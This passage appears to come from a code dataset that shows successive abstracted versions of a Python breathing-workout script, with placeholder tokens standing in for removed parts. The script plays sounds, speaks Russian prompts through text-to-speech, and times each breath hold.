4, 30, 13\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty('voices')\n tts.setProperty('rate', rate)\n tts.setProperty('voice', voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n 
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\nworkout = Workout(rounds, breaths, hold)\nworkout.breathe()\nworkout.statistics()\n", "<import token>\nwarnings.filterwarnings('ignore')\n<docstring token>\n<assignment token>\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty('voices')\n tts.setProperty('rate', rate)\n tts.setProperty('voice', voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\nworkout.breathe()\nworkout.statistics()\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\ndef speak(what):\n speech_voice = 3\n rate = 120\n tts = pyttsx3.init()\n voices = tts.getProperty('voices')\n tts.setProperty('rate', rate)\n tts.setProperty('voice', voices[speech_voice].id)\n print('🔊', what)\n what = correct_numerals(what)\n tts.say(what)\n tts.runAndWait()\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\ndef play_wav_inline(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n\n\ndef play_wav(src):\n wav = pyglet.media.load(sys.path[0] + '\\\\src\\\\wav\\\\' + src + '.wav')\n wav.play()\n time.sleep(wav.duration)\n\n\n<function token>\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n\n\ndef correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):\n new_phrase = []\n py_gen = 1\n phrase = phrase.split(' ')\n while phrase:\n word = phrase.pop(-1)\n if 'NUMB' in morph.parse(word)[0].tag:\n new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))\n else:\n new_phrase.append(word)\n py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0\n ].tag else pytils.numeral.MALE\n return ' '.join(new_phrase[::-1])\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\ndef nums(phrase, morph=pymorphy2.MorphAnalyzer()):\n \"\"\" согласование существительных с числительными, стоящими перед ними \"\"\"\n phrase = phrase.replace(' ', ' ').replace(',', ' ,')\n numeral = ''\n new_phrase = []\n for word in phrase.split(' '):\n if 'NUMB' in morph.parse(word)[0].tag:\n numeral = word\n if numeral:\n word = str(morph.parse(word)[0].make_agree_with_number(abs(int(\n numeral))).word)\n new_phrase.append(word)\n return ' '.join(new_phrase).replace(' ,', ',')\n\n\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n\n def __init__(self, rounds=3, breaths=30, hold=15):\n self.rounds = rounds\n self.breaths = breaths\n self.hold = hold\n self.round_times = []\n self.lock = threading.Lock()\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n\n def __str__(self):\n return '\\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n\n def statistics(self):\n print('=============')\n for i in range(len(self.round_times)):\n print('Раунд', i, self.round_times[i])\n print('=============')\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n\n def breathe(self):\n self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))\n self.say('Каждый раунд это ' + nums(str(self.breaths) +\n ' глубокий вдох - и спокойный выдох'))\n self.say('Приготовились...')\n for i in range(self.rounds):\n self.__breathe_round(i + 1)\n self.say('Восстанавливаем дыхание.')\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(\n mins, secs)))\n\n def __clock_tick(self):\n for i in range(self.hold):\n if i < hold - 3:\n time.sleep(1)\n else:\n play_wav('clock')\n play_wav_inline('gong2')\n\n def __breathe_round(self, round):\n self.say('Раунд ' + str(round))\n for i in range(self.breaths):\n if i % 10 == 0:\n play_wav_inline('gong')\n play_wav('inhale')\n print(i + 1, end=' ')\n play_wav('exhale')\n print()\n self.say('Задерживаем дыхание на выдохе')\n self.__hold_breath()\n self.__clock_tick()\n play_wav_inline('exhale')\n self.say('Выдох')\n time.sleep(1)\n <function token>\n <function token>\n\n def say(self, what):\n self.lock.acquire()\n thread = threading.Thread(target=speak, kwargs={'what': what})\n thread.start()\n thread.join()\n self.lock.release()\n\n\n<assignment token>\n<code token>\n", "<import token>\n<code token>\n<docstring token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass Workout:\n <function token>\n <function token>\n\n def __hold_breath(self):\n start_time = time.time()\n input()\n seconds = int(time.time() - start_time)\n mins = seconds // 60\n secs = seconds % 60\n self.round_times.append('{:02}:{:02}'.format(mins, secs))\n play_wav_inline('inhale')\n self.say('Глубокий вдох. 
